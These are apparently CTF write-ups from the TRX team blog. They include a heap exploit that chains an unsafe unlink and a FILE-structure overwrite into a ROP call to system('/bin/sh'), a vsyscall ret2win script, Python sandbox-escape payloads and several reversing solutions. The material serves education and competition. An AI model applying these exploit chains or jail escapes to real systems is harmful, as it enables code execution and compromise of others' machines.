        r.recvuntil(b"your IBAN is ")
        ret = r.recv(31)
        r.recvuntil(b">")
        return ret

    def free(IBAN):
        r.sendline(b"3")
        r.recvuntil(b"Please enter your IBAN:")
        r.send(IBAN)
        r.recvuntil(b">")

    def deposit(IBAN, n):
        r.sendline(b"4")
        r.send(IBAN)
        r.sendline(bstr(n))
        r.recvuntil(b">")

    def transfer(src, dst, n):
        r.sendline(b"5")
        r.send(src)
        r.send(dst)
        r.sendline(n)
        r.recvuntil(b"How much do you want to transfer?\n")
        ret = r.recvline()
        r.recvuntil(b">")
        return ret

    def spray_heap(data=None):
        if data==None:
            r.send(b"AA")
            r.recvuntil(b">")
            return

        for i in range(0, len(data), 0x2):
            r.send(data[i:i+2])
            r.recvuntil(b">")

    def backdoor(addr, data=None):
        r.sendline(b"6")
        r.sendline(hex(addr).encode())
        r.send(data)
        r.recvuntil(b">")

    def binary_search(l, r, type=None):
        mid = (l+r)//2

        free(n[0])
        n[0] = malloc()
        deposit(n[0], mid)
        if type == "STACK":
            fp = FileStructure()
            fp.fileno = 3
            fp._lock = exe.bss(0x300)
            backdoor(exe.sym.secret_backdoor, bytes(fp)[0x60:0x60+0x77])
        elif type == "HEAP":
            n[0x1f] = malloc()
            free(n[0x1f])
        elif type == "LIBC":
            spray_heap()

        res = transfer(n[0], n[1], b"-")

        if l>=r:
            return mid
        elif b"insufficient" in res:
            l=mid+1
        elif b"completed" in res:
            r=mid-1
        return binary_search(l,r, type)

    '''
    USE UNINITIALIZED VARIABLE AS AN ORACLE TO LEAK PIE/HEAP/LIBC
    '''
    n = []
    for i in range(0x2):
        n.append(malloc())

    exe.address = binary_search(0, 2**48) - exe.sym.deposit - 225
    log.info(f"PIE @ {hex(exe.address)}")
    stack = binary_search(0, 2**48, "STACK")
    log.info(f"STACK @ {hex(stack)}")

    for i in range(0x1d):
        n.append(malloc())
    n.append(0)

    heap = binary_search(0, 2**48, "HEAP") - 0x1a30
    log.info(f"HEAP @ {hex(heap)}")

    libc.address = binary_search(0, 2**48, "LIBC") - libc.sym.puts - 474
    log.info(f"LIBC @ {hex(libc.address)}")

    '''
    UNSAFE UNLINK TO OVERWRITE SAVED RBP AND ROP
    '''

    fp = FileStructure()
    fp.fileno = 0
    fp._lock = exe.bss(0x300)
    fp.chain = heap+0x5a0 #our saved ropchain on the heap
    fp.unknown2 = p64(0)*2 + p64(stack-0x168) + p64(-1, signed=True) + p64(0) #prevchain and the saved rbp on the stack

    backdoor(exe.sym.secret_backdoor, bytes(fp)[0x60:0x60+0x77])

    rop2 = ROP(libc)
    rop2.rdi = libc.binsh()
    rop2.raw(rop2.ret.address)
    rop2.raw(libc.sym.system)

    rop = ROP(libc)
    rop.raw(b"A"*0xf8)
    rop.read(0, stack-0x200, len(rop2.chain()))
    rop.rsp = stack-0x200

    for i in range(11):
        free(malloc())
    r.sendline(b"2")
    r.send(b"\0"*15)
    r.recvuntil(b">", timeout=2)
    free(n[0])

    r.sendline(b"2")
    r.send((rop.chain()))
    #gdb.attach(r, gdbscript="b fclose\nb *leave+97\nc")
    fp = FileStructure()
    fp.fileno = 3
    fp._lock = exe.bss(0x300)
    fp.chain = heap+0x5a0 #our saved ropchain on the heap
    fp.unknown2 = p64(0)*2 + p64(stack-0x168) + p64(-1, signed=True) + p64(0) #prevchain and the saved rbp on the stack

    r.recvuntil(b">")
    backdoor(exe.sym.secret_backdoor, bytes(fp)[0x60:0x60+0x77])
    r.sendline(b"7")
    r.recvuntil(b"We're sorry ")
    r.send(rop2.chain())

    r.interactive()

if __name__ == "__main__":
    main()

Flag

TRX{un54f3_unl1nk_15_n07_f0r_7h3_h34p_0nly_a4b62c68}

TRX CTF 25 - virtual insanity

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Description

Dancing, Walking, Rearranging Furniture

DISCLAIMER: This challenge doesn’t require brute-forcing

Overview of the challenge

The challenge is a standard ret2win with a pretty obvious overflow of 0x30 bytes, the binary is compiled without stack canary protection but has pie, with no apparent way to leak addresses.

Solution

The intended solution involves performing a partial overwrite to redirect execution to the win function. However, the return address on the stack is a libc address. To work around this, we can leverage vsyscall to traverse the stack until we locate the address of main. By modifying its least significant byte (LSB), we can transform it into the address of win. When execution returns, vsyscall effectively acts as a ret gadget, allowing us to redirect control flow to win.

Before overwrite:

After overwrite:

Solve Script

#!/usr/bin/env python3

from pwn import *
from time import sleep

exe = ELF("./chall")

context.binary = exe

REMOTE_NC_CMD    = "nc localhost 7011"    # `nc  `

bstr = lambda x: str(x).encode()
ELF.binsh = lambda self: next(self.search(b"/bin/sh\0"))

GDB_SCRIPT = """
set follow-fork-mode parent
set follow-exec-mode same
"""

def conn():
    if args.LOCAL:
        return process([exe.path])

    if args.GDB:
        return gdb.debug([exe.path], gdbscript=GDB_SCRIPT)

    return remote(REMOTE_NC_CMD.split()[1], int(REMOTE_NC_CMD.split()[2]))

def main():
    r = conn()

    VSYSCALL = 0xffffffffff600000 #effectively a ret gadget
    r.send(b"A"*0x28 + p64(VSYSCALL)*2 + b"\xa9"); #lsb of win()

    r.interactive()

if __name__ == "__main__":
    main()

Flag

TRX{1_h0p3_y0u_d1dn7_bru73f0rc3_dc85efe0}

Srdnlen CTF 2025 - Anodic Music

info@theromanxpl0.it (TRX) — Sun, 19 Jan 2025 00:00:00 +0000

As always we can start by decompiling the main function:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char *dialogue; // rax
  int i; // [rsp+Ch] [rbp-64h]
  void *v6; // [rsp+10h] [rbp-60h]
  s_bank *bank; // [rsp+18h] [rbp-58h]
  char input[68]; // [rsp+20h] [rbp-50h] BYREF
  unsigned __int64 canary; // [rsp+68h] [rbp-8h]

  canary = __readfsqword(0x28u);
  memset(input, 0, 62);
  v6 = malloc(0x10uLL);
  bank = load_bank();
  setbuf(_bss_start, 0LL);
  setbuf(stdin, 0LL);
  for ( i = 0; i <= 61; ++i )
  {
    dialogue = get_dialogue();
    printf("%s", dialogue);
    input[i] = getc(stdin);
    getc(stdin);
    md5String(input, v6);
    if ( (unsigned __int8)lookup_bank(v6, bank) )
    {
      puts("There has to be some way to talk to this person, you just haven't found it yet.");
      return -1;
    }
  }
  printf("Hey it looks like you have input the right flag. Why are you still here?");
  return 0;
}

We can now analyze the following not known functions, starting from load_bank:

_QWORD *load_bank()
{
  _QWORD *result; // rax
  FILE *stream; // [rsp+0h] [rbp-20h]
  __int64 size; // [rsp+8h] [rbp-18h]
  void *bank; // [rsp+10h] [rbp-10h]

  stream = fopen("hardcore.bnk", "rb");
  fseek(stream, SEEK_SET, SEEK_END);
  size = ftell(stream);
  rewind(stream);
  bank = malloc(size);
  fread(bank, size, 1uLL, stream);
  fclose(stream);
  result = malloc(0x10uLL);
  *result = size;
  result[1] = bank;
  return result;
}

As we can see, it is loading the other file that was given to us and loading is what it seems a struct that we can define as:

struct s_bank // sizeof=0x10
{
    __int64 size;
    char *bank;
};

Now we can continue by looking into get_dialogue, which is pretty useless:

char *get_dialogue()
{
  char ptr; // [rsp+Fh] [rbp-11h] BYREF
  FILE *stream; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  stream = fopen("/dev/urandom", "rb");
  fread(&ptr, 1uLL, 1uLL, stream);
  return (&dialogue)[ptr & 0xF];
}

Then we have md5String:

unsigned __int64 __fastcall md5String(const char *input, char *out)
{
  size_t size; // rax
  __int64 v3; // rdx
  MD5Context ctx; // [rsp+10h] [rbp-70h] BYREF
  unsigned __int64 canary; // [rsp+78h] [rbp-8h]

  canary = __readfsqword(0x28u);
  md5Init((__int64)&ctx);
  size = strlen(input);
  md5Update(&ctx, input, size);
  md5Finalize(&ctx);
  v3 = *(_QWORD *)&ctx.digest[8];
  *(_QWORD *)out = *(_QWORD *)ctx.digest;
  *((_QWORD *)out + 1) = v3;
  return canary - __readfsqword(0x28u);
}

Which is doing an md5sum with a library like https://github.com/Zunawe/md5-c, where we can extract the context type for better reversing:

struct MD5Context // sizeof=0x68
{                                       // XREF: md5String/r
    uint64_t size;
    uint32_t buffer[4];
    uint8_t input[64];
    uint8_t digest[16];                 // XREF: md5String+5D/r
                                        // md5String+61/r
};

And lastly we have lookup_bank which is checking if the hash is into the given bank of hashes

__int64 __fastcall lookup_bank(const void *a1, s_bank *a2)
{
  __int64 i; // [rsp+18h] [rbp-8h]

  for ( i = 0LL; i < a2->size / 16; ++i )
  {
    if ( !memcmp(a1, &a2->bank[16 * i], 0x10uLL) )
      return 1LL;
  }
  return 0LL;
}

So, after reversing all the functions we can say that the main, after loading the bank into memory, i doing the hash of the current char that is read from the user and checking if into the bank, so we can think of try manualy some characters knowing that the flag format is srdnlen{, but after some tries we can see that also other characters are valid (like t is valid, but the first char should be s), so we are analyzing a trie like data structure that we can explore with a dfs:

from string import printable
from hashlib import md5

with open('hardcore.bnk', 'rb') as f:
	data = f.read()

hashes = [data[i*16:(i+1)*16] for i in range(len(data)//16)]

flag = 'srdnlen{'

def dfs(flag):
	if len(flag) == 63:
		exit(0)

	for c in printable[:-6]:
		tmp = flag + c
		digest = md5(tmp.encode()).digest()
		if digest not in hashes:
			print(tmp)
			dfs(tmp)


dfs(flag)

After running the whole script we get the flag: srdnlen{Mr_Evrart_is_helping_me_find_my_flag_af04993a13b8eecd}

Srdnlen CTF 2025 - Another Impossible Escape

info@theromanxpl0.it (TRX) — Sun, 19 Jan 2025 00:00:00 +0000

Challenge

#!/usr/bin/env python3
import sys
import re

BANNER = r"""
############################################################
#       _                _   _                             #
#      / \   _ __   ___ | |_| |__   ___ _ __               #
#     / _ \ | '_ \ / _ \| __| '_ \ / _ \ '__|              #
#    / ___ \| | | | (_) | |_| | | |  __/ |                 #
#   /_/   \_\_| |_|\___/ \__|_| |_|\___|_|                 #
#      ___                               _ _     _         #
#     |_ _|_ __ ___  _ __   ___  ___ ___(_) |__ | | ___    #
#      | || '_ ` _ \| '_ \ / _ \/ __/ __| | '_ \| |/ _ \   #
#      | || | | | | | |_) | (_) \__ \__ \ | |_) | |  __/   #
#     |___|_| |_| |_| .__/ \___/|___/___/_|_.__/|_|\___|   #
#    _____          |_|                                    #
#   | ____|___  ___ __ _ _ __   ___                        #
#   |  _| / __|/ __/ _` | '_ \ / _ \                       #
#   | |___\__ \ (_| (_| | |_) |  __/   (Author: @uNickz)   #
#   |_____|___/\___\__,_| .__/ \___|                       #
#                       |_|                                #
#                                                          #
############################################################
"""

FLAG = "srdnlen{fake_flag}"
del FLAG

class IE:
    def __init__(self) -> None:
        print(BANNER)
        print("Welcome to another Impossible Escape!")
        print("This time in a limited edition! More information here:", sys.version)

        self.try_escape()
        return

    def code_sanitizer(self, dirty_code: str) -> str:
        if len(dirty_code) > 60:
            print("Code is too long. Exiting.")
            exit()

        if not dirty_code.isascii():
            print("Alien material detected... Exiting.")
            exit()

        banned_letters = ["m", "w", "f", "q", "y", "h", "p", "v", "z", "r", "x", "k"]
        banned_symbols = [" ", "@", "`", "'", "-", "+", "\\", '"', "*"]
        banned_words = ["input", "self", "os", "try_escape", "eval", "breakpoint", "flag", "system", "sys", "escape_plan", "exec"]

        if any(map(lambda c: c in dirty_code, banned_letters + banned_symbols + banned_words)):
            print("Are you trying to cheat me!? Emergency exit in progress.")
            exit()

        limited_items = {
            ".": 1,
            "=": 1,
            "(": 1,
            "_": 4,
        }

        for item, limit in limited_items.items():
            if dirty_code.count(item) > limit:
                print("You are trying to break the limits. Exiting.")
                exit()

        cool_code = dirty_code.replace("\\t", "\t").replace("\\n", "\n")
        return cool_code

    def escape_plan(self, gadgets: dict = {}) -> None:
        self.code = self.code_sanitizer(input("Submit your BEST Escape Plan: ").lower())
        return eval(self.code, {"__builtins__": {}}, gadgets)

    def try_escape(self) -> None:
        tries = max(1, min(7, int(input("How many tries do you need to escape? "))))

        for _ in range(tries):
            self.escape_plan()

        return

if __name__ == "__main__":
    with open(__file__, "r") as file_read:
        file_data = re.sub(r"srdnlen{.+}", "srdnlen{REDATTO}", file_read.read(), 1)

    with open(__file__, "w") as file_write:
        file_write.write(file_data)

    IE()

Solve

This challenge is a pyjail with the following limitations:

We can’t use the following characters:

mwfqyhpvzrxk @`\'-+\"*

We can’t use the following words: input, self, os, try_escape, eval, breakpoint, flag, system, sys, escape_plan, exec
We can only use ASCII characters
Builtins are removed
Also, some characters have a limited usage
- We can only use ) once
- We can only use . once
- We can only use = once
- We can only use _ four times

A few important things:

We can execute a maximum of 7 payloads, with a limit of 60 characters each.
The variables defined by us will persist between every payload execution.
The flag is in a variable called FLAG, which is deleted before executing our payloads and the string will be replaced with srdnlen{REDATTO}

Since we can’t use certain characters, [this script](LINK HERE!!!!!!!!!!!!!!!!!!!) created two years ago by me, could come in handy.

My idea consists in grabbing eval and input so I can execute arbitrary code. Since there’s a character blacklist I had to build the payload while minding the constraints:

(builtins:={}.__class__.__subclasses__()[2].total.__builtins__,lst:=[].__class__(builtins),input:=builtins[lst[28]],eval:=builtins[lst[20]],eval(input(),builtins))
# Inside eval: __import__("code").interact()

Now that we have an interactive console, we can restore the flag by dumping all the objects tracked by the python garbage collector:

__import__("gc").get_objects()

Final exploit

[a:={}.__class__]
[b:=a.__subclasses__]
[b:=b()[2].total]
[b:=b.__builtins__]
[a:=[].__class__(b)]
[c:=[b[a[20]],b[a[28]]()]]
__import__("code").interact()
[d:=c[0](c[1],b)]

__import__("gc").get_objects()

Srdnlen CTF 2025 - It's not what it seems

info@theromanxpl0.it (TRX) — Sun, 19 Jan 2025 00:00:00 +0000

At first glance the challenge seems pretty standard, a flag checker, so after opening the binary with IDA, the following main function is showed:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v5; // rax
  unsigned int v6; // eax
  int v7; // [rsp+Ch] [rbp-874h] BYREF
  _BYTE v8[1024]; // [rsp+10h] [rbp-870h] BYREF
  __int64 v9; // [rsp+410h] [rbp-470h]
  __int64 v10; // [rsp+418h] [rbp-468h]
  __int64 v11; // [rsp+420h] [rbp-460h]
  _QWORD v12[3]; // [rsp+428h] [rbp-458h]
  char s[1024]; // [rsp+440h] [rbp-440h] BYREF
  _BYTE v14[16]; // [rsp+840h] [rbp-40h] BYREF
  _BYTE v15[32]; // [rsp+850h] [rbp-30h] BYREF
  __int64 v16; // [rsp+870h] [rbp-10h]
  int v17; // [rsp+87Ch] [rbp-4h]

  if ( (unsigned int)RAND_bytes(v15, 32LL, envp) )
  {
    if ( (unsigned int)RAND_bytes(v14, 16LL, v3) )
    {
      printf("FLAG: ");
      fgets(s, 1024, _bss_start);
      s[strcspn(s, "\n")] = 0;
      v9 = 0x3B2E252C2E243233LL;
      v10 = 0x32341F327336732ELL;
      v11 = 0x1F7328141F347535LL;
      v12[0] = 0x2E35261F2E71742DLL;
      *(_QWORD *)((char *)v12 + 6) = 0x3D2E707134232E35LL;
      v17 = 0;
      v16 = EVP_CIPHER_CTX_new();
      if ( v16 )
      {
        v5 = EVP_aes_256_cbc();
        if ( (unsigned int)EVP_EncryptInit_ex(v16, v5, 0LL, v15, v14) == 1 )
        {
          v7 = 0;
          v6 = strlen(s);
          if ( (unsigned int)EVP_EncryptUpdate(v16, v8, &v7, s, v6) == 1 )
          {
            v17 += v7;
            if ( (unsigned int)EVP_EncryptFinal_ex(v16, &v8[v7], &v7) == 1 )
            {
              v17 += v7;
              EVP_CIPHER_CTX_free(v16);
              puts("Nope!");
              return 0;
            }
            else
            {
              fwrite("Error finalizing encryption.\n", 1uLL, 0x1DuLL, stderr);
              EVP_CIPHER_CTX_free(v16);
              return 1;
            }
          }
          else
          {
            fwrite("Error during encryption.\n", 1uLL, 0x19uLL, stderr);
            EVP_CIPHER_CTX_free(v16);
            return 1;
          }
        }
        else
        {
          fwrite("Error initializing encryption.\n", 1uLL, 0x1FuLL, stderr);
          EVP_CIPHER_CTX_free(v16);
          return 1;
        }
      }
      else
      {
        fwrite("Error creating context.\n", 1uLL, 0x18uLL, stderr);
        return 1;
      }
    }
    else
    {
      fwrite("Error generating random IV.\n", 1uLL, 0x1CuLL, stderr);
      return 1;
    }
  }
  else
  {
    fwrite("Error generating random key.\n", 1uLL, 0x1DuLL, stderr);
    return 1;
  }
}

This is really a strange function, because, there is no flag check, so the first thounght is to check the .init_array section for global constructors, but it ends up without functions. The next step is to set a breakpoint on the EVP_EncryptFinal_ex function call to see what is happening. But this breakpoint is never being triggered, so we know that something strange is happening, and after a quick realization we can find that the _start function is not the standard one:

void __noreturn start()
{
  signed __int64 v0; // rax
  const char **v1; // rdx
  const char *v2; // rsi
  __int64 v3; // rcx
  _BYTE *key; // rdi
  __int64 v5; // rax
  signed __int64 v6; // rax
  signed __int64 v7; // rax
  __int64 buf; // [rsp+0h] [rbp-8h] BYREF

  v0 = sys_mprotect((unsigned __int64)main & 0xFFFFFFFFFFFFF000LL, 0x1000uLL, 7uLL);
  v2 = (const char *)main;
  v3 = 342LL;
  key = &keys;
  do
  {
    *v2++ ^= *key++;
    --v3;
  }
  while ( v3 );
  LODWORD(v5) = main((int)key, (const char **)v2, v1);
  if ( v5 )
  {
    buf = '!seY';
    v6 = sys_write(1u, (const char *)&buf, 4uLL);
  }
  v7 = sys_exit(0);
}

As what we can see by the decopiled code of IDA, the start is decrypting the main, so we can set a breakpoint on the main function call to see it decrypted:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  char *v4; // rdi
  _BYTE *i; // rsi
  _QWORD v6[3]; // [rsp+410h] [rbp-470h] BYREF
  _QWORD v7[3]; // [rsp+428h] [rbp-458h]
  char in[1024]; // [rsp+440h] [rbp-440h] BYREF
  _BYTE iv[16]; // [rsp+840h] [rbp-40h] BYREF
  _BYTE key[32]; // [rsp+850h] [rbp-30h] BYREF

  if ( (unsigned int)RAND_bytes(key, 32LL) )
  {
    if ( (unsigned int)RAND_bytes(iv, 16LL) )
    {
      printf("FLAG: ");
      fgets(in, 1024, _bss_start);
      v4 = in;
      in[strcspn(in, "\n")] = 0;
      v6[0] = 0x3B2E252C2E243233LL;
      v6[1] = 0x32341F327336732ELL;
      v6[2] = 0x1F7328141F347535LL;
      v7[0] = 0x2E35261F2E71742DLL;
      result = 0x34232E35;
      *(_QWORD *)((char *)v7 + 6) = 0x3D2E707134232E35LL;
      for ( i = v6; ; ++i )
      {
        LOBYTE(result) = *i;
        if ( (*i ^ (unsigned __int8)*v4) != 64 )
          break;
        ++v4;
        if ( (_BYTE)result == 61 )
          return result;
      }
      puts("Nope!");
      return 0;
    }
    else
    {
      fwrite("Error generating random IV.\n", 1uLL, 0x1CuLL, stderr);
      return 1;
    }
  }
  else
  {
    fwrite("Error generating random key.\n", 1uLL, 0x1DuLL, stderr);
    return 1;
  }
}

As we can see, the decrypted function is actually checking the flag by xorring the strange bytes that we saw earlier with the input to get 64 (0x40), so we can reverse he operation and flag:

from pwn import xor
from Crypto.Util.number import long_to_bytes

flag = [
	0x3B2E252C2E243233,
	0x32341F327336732E,
	0x1F7328141F347535,
	0x2E35261F2E71742D,
	0x3D2E707134232E35,
]

flag = b''.join([long_to_bytes(i) for i in flag[::-1]])

print(xor(flag, 0x40)[::-1])

this takes out the following flag: srdnlen{n3v3r_tru5t_Th3_m41n_fununct10n} which is wrong, but we can fix it by removing the extra un in fununct10n to get the real flag srdnlen{n3v3r_tru5t_Th3_m41n_funct10n}

Srdnlen CTF 2025 - SSPJ

info@theromanxpl0.it (TRX) — Sun, 19 Jan 2025 00:00:00 +0000

Challenge

import random

class SSPJ(object):
 def __init__(self):
 print("Welcome to the Super Secure Python Jail (SSPJ)!")
 print("You can run your code here, but be careful not to break the rules...")

 self.code = self.code_sanitizer(input("Enter your data: "))

 # I'm so confident in my SSPJ that
 # I don't even need to delete any globals/builtins
 exec(self.code, globals())
 return

 def code_sanitizer(self, code: str) -> str:
 if not code.isascii():
 print("Alien material detected... Exiting.")
 exit()

 banned_chars = [
 # Why do you need these characters?
 "m", "o", "w", "q", "b", "y", "u", "h", "c", "v", "z", "x", "k"
 ]

 banned_digits = [
 # Why do you need these digits?
 "0", "7", "1"
 ]

 banned_symbols = [
 # You don't need these...
 ".", "(", "'", "=", "{", ":", "@", '"', "[", "`"
 ]

 banned_words = [
 # Oh no, you can't use these words!
 "globals", "breakpoint", "locals", "self", "system", "open",
 "eval", "import", "exec", "flag", "os", "subprocess", "input",
 "random", "builtins", "code_sanitizer"
 ]

 blacklist = banned_chars + banned_digits + banned_symbols + banned_words
 random.shuffle(blacklist)

 if any(map(lambda c: c in code, blacklist)):
 print("Are you trying to cheat me!? Emergency exit in progress.")
 exit()

 return code.lower()

if __name__ == "__main__":
 SSPJ()

Solve

This is a simple pyjail. We can’t use (, [, { and also ., = so it’s basically impossible to pollute attributes of help, license, etc.

CSAW '24 Cybersecurity Awareness Communication Challenge Report

info@theromanxpl0.it (TRX) — Sun, 17 Nov 2024 00:00:00 +0000

I (Titto) participated in the Cybersecurity Awareness Communication Challenge 2024. Below is the qualification report that allowed me and my teammate Ryan to qualify for the final, which took place at Esisar in Valence.

I’m happy to have represented the TRX name in a competition that was less technical than those we usually play. For more details on the experience and the implementation strategy we used for the final, you can read my blog post on my personal website.

Thank you

Team Mashers - Qualification report

CSAW '24 Embedded Security Challenge Report

info@theromanxpl0.it (TRX) — Thu, 14 Nov 2024 00:00:00 +0000

Some of our members participated in the CSAW Embedded Security Challenge 2024. Below is the qualification report that allowed the team representing TRX to qualify for the final, which took place at Esisar in Valence.

TRX Technical Labs - Final report

GPN 2024 - Parabox

info@theromanxpl0.it (TRX) — Thu, 13 Jun 2024 15:08:35 +0200

WARNING! The second video in the “Find the Missing -> UNDO for the win” Section and the video in “Conclusions” contains flashing images, it should not auto play but pay attention.

Challenge Information

Description

This game looked real fun, unfortunately they did not support my platform. I wanted to play it anyway, so I built this small version myself. Some things went wrong (writing assembly is hard), but I’m sure you can win nonetheless.

Go push some paraboxes!

Files

parabox.tar.gz, contains gbc ROM file and GearBoy, which is a linux Game Boy Color emulator

TLDR

Challenge is a Game Boy Color ROM containing a version of the Parabox game, objective is to win the game on the server by sending the correct moves. The objecctive of the game is to position some boxes and the player in the corrrect positions, for each level we can traverse 3 maps, the main screen plus 2 paraboxes which we can enter, one blue, one green. There are a total of 8 levels and some are impossible trough normal playing, but with some reversing i was able to find 3 vulnerabilities that can be used to beat the game.

The 3 vulns are:

The game saves a list of moves, we can overflow this list by 1 simply by playing the game and overwrite the position of the victory square which is saved immediatly after, can be used to beat the “Impossible” level which has an unreachable finish;
To implemented the undo feature the game periodically saves a copy of each map, when redo is pressed the copy is restored and the moves are replayed, if a level has less maps of its predecessor when we undo we will copy in an additional map from it overwriting some memory, this can be used on the “Missing” level which has impossible constraints;
In the “Last Hurdle” boxes have a connection where they should not;

An overall interesting challenge which included both reversing and some very easy pwning.

WriteUp

Getting things going

I started late for this CTF and when i joined my team i found out we had some new team members which were on their way to solve the easier challenges, so i left them to their devices and decided that i would straight to the hardest ones.

After immediately deciding that “provably wrong” was not for me i landed on Parabox, a retro game reverse challenge, which i generally enjoy.

In the zip provided we find their complete server setup with a Dockerfile and a README which explains that we need to reverse the “parabox.gbc” ROM file and that our objective which is simply to “win the game”.

Let’s start by looking at how the docker sets up the challenge, it clones a version of GearBoy, which is a GameBoy Color emulator and applies a patch to turn off the graphic component, automatically apply the inputs from the player and check whatever the user has achieved the win condition after it.

First thing i did was patch back in the graphic component so that i can actually see the game and reactivate the event monitor so that i could provide inputs from the keyboards after the initial array has run out. Thankfully the organizers left all the removed code as comments so the only thing i needed to do was uncomment some lines and add a check to prevent the game from exiting after it finishes the inputs.

The first levels are just an introduction to the game, so i installed LogKeys to record my keyboard while i solved each screen and wrote a small python script to encode the moves in the game format, here is the solutions of the first 5 levels:

Your browser does not support the video tag. Your browser does not support the video tag. Your browser does not support the video tag. Your browser does not support the video tag. Your browser does not support the video tag.

The objective of the game is to get our character in the finish square and to put a box in all the designed spots, the twist here is the presence of “paraboxes” which are boxes that we both move and enter inside, as shown in level 4.

After completing the intro levels the real challenge starts, we reach the “Impossible” level which, as the name suggests, has an unreachable ending square and is thus impossible to finish through normal means. Well, i had my fun with the game, now it’s time to break it.

Beating the “Impossible”

The solution to this part is actually pretty easy, i passed the level by accident a couple times and then i noticed what was happening by looking at the program memory, which is thankfully one of the features offered by GearBoy.

Let’s note down some of the area in memory to look up later, i was able to find:

the map of the level at 0xc100, red box;
the current position of the player at 0xc1f8, blue box;
the history of played moves at 0xc200, green box;
the position of the winning square at 0xc271, yellow box;

Your browser does not support the video tag.

Any pwn expert reading this has already snuffed out where a vulnerability might be, i am not very good at pwning so it took me a bit of time but the interesting part here is that we have an array that grows, the move history, which is very near our victory square position, if the boundary of this array is not enforced correctly we may be able to overwrite the position of the finish.

Indeed, this is a vulnerability as the limit of the move history is one byte too much, allowing us to overwrite the position with the value assigned to our move. Again from the move history we find out that the values are:

0x10 for RIGHT;
0x20 for LEFT;
0x40 for UP;
0x80 for DOWN;

Now all we need to do to beat the impossible level is make a bunch of random moves to fill up the history array until the end, then make a move which corresponds to a square we can reach, which is only LEFT, then go to that square and finish the level. Using left as our overflow move we end up with the finish in the bottom left, here’s my version of the solution:

Your browser does not support the video tag.

After beating this we reach level “small” which is a normal level, then we reach “Missing” and even after putting all the boxes in the correct place the level wont let me advance, clearly there some shenanigans happening here and it’s actually time to start reversing to find out what is going on.

Find the “Missing”

With the initial googling for this challenge i discovered GhidraBoy which is a Ghidra extension for reversing GBC games, so installed that, booted up Ghidra and the result was some really nicely formatted pseudo-code which was pretty surprising.

Understanding victory conditions

With a decompiler in hand i put some memory breakpoints with GearBoy on the address of the finish square, i wanted to check how a victory is calculated as it seems that this was the problem with the level. Turns out that the victory condition is checked at every game loop by the function at 0x0733, and after some reversing i discovered that it does something like this:

struct victory_condition {
    u8 position;
    u8 map;
    u8 value;
};
u8 check_victory() {
  struct victory_condition* curr = 0xc279; // victory condition position
  u8 win = 1;
  u8 curr_value;
  while( true ) {
    if (curr->position == -1) break;
    curr_value = get_value_from_map(curr->map, curr->position);
    if (!check_correct_value(curr->value, curr_value)) {
      win = 0;
    }
    victory_condition++;
  }
  return win;
}

There are multiple conditions starting at 0xc279 that we need to beat a level, the first is always to have the player on the finish square, then we can have an arbitrary number of other conditions which check the correct position of the boxes. Each condition is associated with a map, a level can have up to three maps, the first is where the players spawns, the other two are the green and blue “paraboxes”, shown below for the level “small”:

Now let’s have a look at the victory conditions for the “Missing” level:

{
    [0x06, 0, 0],
    [0x24, 1, 1],
    [0x25, 1, 1],
    [0x25, 1, 1],
    [0x04, 2, 1],
    [0x07, 2, 1],
}

Unfortunately, it looks like we have two extra conditions on map 2, the green box, which we can’t access in the “Missing” level, making the level impossible.

Here i got stuck for a while, then i tried pressing a button which i still hadn’t used, the “UNDO”, and discovered something interesting.

UNDO for the win

The game offers an UNDO button for when you make a mistake during the puzzle, this allows to cancel your last move, this is probably why the move history exists, to allow for the rewind.

However, the implementation of the feature is peculiar, instead inverting the logic of a single move to rewind, it restores all the maps of the level to a past state, then it re-plays all the moves in the history except for the last one, it is not shown on screen but we can clearly see it from the memory if we slowdown the video a bit:

Your browser does not support the video tag.

Now after a bit of reversing and some breakpoints i was able to find the functions that save and restore the level, which are at 0x06c3 and 0x0706 respectively. Here we can find the vulnerability, when a level is saved, only the maps active in the level are copied to the buffer, but when a level is restored, all 3 maps are replaced with the contents of the buffer, even if the current level does not utilize all the maps. Now, if we remember the victory conditions for the “Missing” level, we needed a 2 objects in map 3 which is not present in the level, luckily for us, the level before, “Small”, has a green parabox, which corresponds to map 3. What we need to do is make a bunch of moves in the level “Small” to make the game save its state, then in the level “Missing” we undo to copy “Small” third map into “Missing”.

Now, the only thing left to do is setup the state of the green parabox in “Small” so that it satisfies the win conditions of “Missing” before saving the state, this means we need to fill up both spots in the parabox, unfortunately, this is impossible as the level has only one box we can use. However, after a bit of testing, it turns out that the id representing the player on the map changes at every level depending on the number of boxes and the value assigned to us by the level “Small” actually fulfils the requirements for a box in the level “Missing”.

So now we have all the pieces, we go in and out of the green box in “Small” to setup a saved state for map 3, then in “Missing” we press UNDO at the start to get the last winning conditions, then complete the level as normal. Here is my solution:

BEWARE! FLASHING IMAGES!

your browser does not support the video tag.

I skipped some details for the sake of clarity, but the game actually saves 4 states to restore instead of only 1, it does so every 32 moves probably because it would take too much time to re-play the full length of the move history array, so at the start of “Missing” i have to waste some moves to re-align myself with the correct saved state.

Also in both levels i end up overwriting the finish square with a bad move, so at the end i have to reset it to a reachable square, could have optimized it better but i was starting to get real tired at this point so i just left it.

A bit of luck saves the night

So i reached this point, the “Last Hurdle”, at 4AM in the morning, i started this challenge at 7PM after a full 8-hour work day and skipped dinner, so i was pretty much about to collapse.

I really wanted to finish this challenge to get the first blood before going to bed, but i had to hope for an easy last level or i would not make it. This is what is saw:

There is no hidden condition here so you just need to get the box at the center of the green parabox and you win, unfortunately there is no way for the player to enter the green parabox, i edited the game memory removing a wall to see it the first time, so you can never push the box down to its position.

My idea here was to somehow duplicate the boxes and push both inside the green parabox so that one would go in the correct square and, in a wonderful moment of luck, i pushed to box down in the bottom left corner of the blue parabox.

The bottom and right side of the blue parabox are facing a wall so i should not able to push anything in, i followed the box and, surprisingly, i found myself inside the green parabox. By sheer luck, in only around 20 minutes of playing around, i found the glitch, the left corner of the blue parabox is connected to the green parabox, with this information the solution to the level is trivial, here it is:

your browser does not support the video tag.

Conclusions

With all the solutions i updated my script to send the moves to the server with pwntools and i got the flag:

GPNCTF{p41n_70_d3v3l0p_h0p3fully_l355_p41n_70_50lv3_fd29a4b2833}

I can imagine the pain to develop, thank you for your sacrifice, i had fun, not sure if it was less of a pain tough.

